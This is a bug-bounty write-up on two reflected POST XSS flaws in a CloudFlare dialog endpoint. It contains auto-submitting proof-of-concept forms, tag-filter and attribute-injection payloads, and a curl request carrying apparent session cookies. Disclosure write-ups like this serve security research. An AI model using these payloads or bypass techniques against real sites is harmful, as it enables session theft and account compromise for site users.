XSS in CloudFlare

#1 XSS

These are some of my duplicate vulnerabilities found. I just thought of sharing with you. Recently I found two POST XSS in CloudFlare and unfortunately I was not the first to report.
I found the first issue in the “Confirm Key Generator” dialog box.

View post on imgur.com

Let’s have a closer look at the URL.

/ajax/model-dialog.htm

It seems like an XMLHttpRequest object is used in the server side it accept our POST request.

View post on imgur.com

After playing around with “content=” parameter what I’ve noticed was that it filters all HTML tags except
[code language=”html”]
<b></b> <p></p><A HREF=””>
[/code]

Well as <A HREF> tag is not filtered we can easily execute JavaScript.
[code language=”html”]
<A HREF=”javascript:alert(document.cookie);”>XSS</A>
[/code]

View post on imgur.com

So the proof of concept would be:
[code language=”html”]
<html>
<!– POC by Osanda –>
<body>
<form name="exploit" action="https://www.cloudflare.com/ajax/modal-dialog.html" method="POST">
<input type="hidden" name="type" value="default" />
<input type="hidden" name="content" value="Go to this link &lt;A HREF=&quot;javascript:prompt(&apos;XSS by Osanda&apos;);&quot;&gt;XSS&lt;/A&gt;" />
<script>document.exploit.submit(); </script>
</form>
</body>
</html>
[/code]

We don’t need an authorized account to trigger XSS since the issue is in “model-dialog.htm”. Here is the Curl command
[code language=”html”]
curl -i -s -k -X ‘POST’ \
-H ‘User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0’ -H ‘Content-Type: application/x-www-form-urlencoded; charset=UTF-8’ -H ‘X-Requested-With: XMLHttpRequest’ -H ‘Referer: https://www.cloudflare.com/my-account’ \
-b ‘__cfduid=dcfb031f1436b2c98ee75cfda0b313f9b1395243158470; __utma=1.1850105675.1399902759.1399910158.1400126593.4; __utmz=1.1399902759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.7.10.1400126593; __utmc=1; vses2=9pvibldsqecve4b63ef9h13h75; __cf_effload=1′ \
–data-binary $’type=default&content=Go to this link <A HREF=\"javascript:prompt(\’XSS by Osanda\’);\">XSS</A>’ \
‘https://www.cloudflare.com/ajax/modal-dialog.html’
[/code]

View post on imgur.com


View post on imgur.com



That is it Game Over 🙂

View post on imgur.com


#2 XSS

The second XSS issue was in the “zoneupload” parameter in the “model-dialog.html” file. In the previous scenario all the HTML tags are truncated but in here instead they are converted into special chars. How to bypass this one? 😉

View post on imgur.com


Well as usual “'() are not filtered 🙂
[code language=”html”]
ABC" onmouseover="prompt(‘XSS by Osanda’) ""
[/code]

View post on imgur.com



Here is the proof of concept:
[code language=”html”]
<html>
<body>
<form action="https://www.cloudflare.com/ajax/modal-dialog.html" method="POST">
<input type="hidden" name="type" value="zoneupload" />
<input type="hidden" name="z" value="google.lk" />
<input type="hidden" name="target" value="ABC&quot; onmouseover=&quot;prompt(&apos;XSS by Osanda&apos;) &quot;&quot;" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
[/code]

So yeah here we go XSS again 😀

View post on imgur.com



Bug hunting is not all about getting your name in hall of fames or receiving rewards or being the first to report. I just enjoy finding vulnerabilities and love to learn something new 🙂

11 thoughts on “XSS in CloudFlare

  1. Thanks for your marvelous posting! I actually enjoyed reading it, you
    could be a great author.I will be sure to
    bookmark your blog and will come back in the foreseeable future.
    I want to encourage continue your great posts, have a nice morning!

Leave a Reply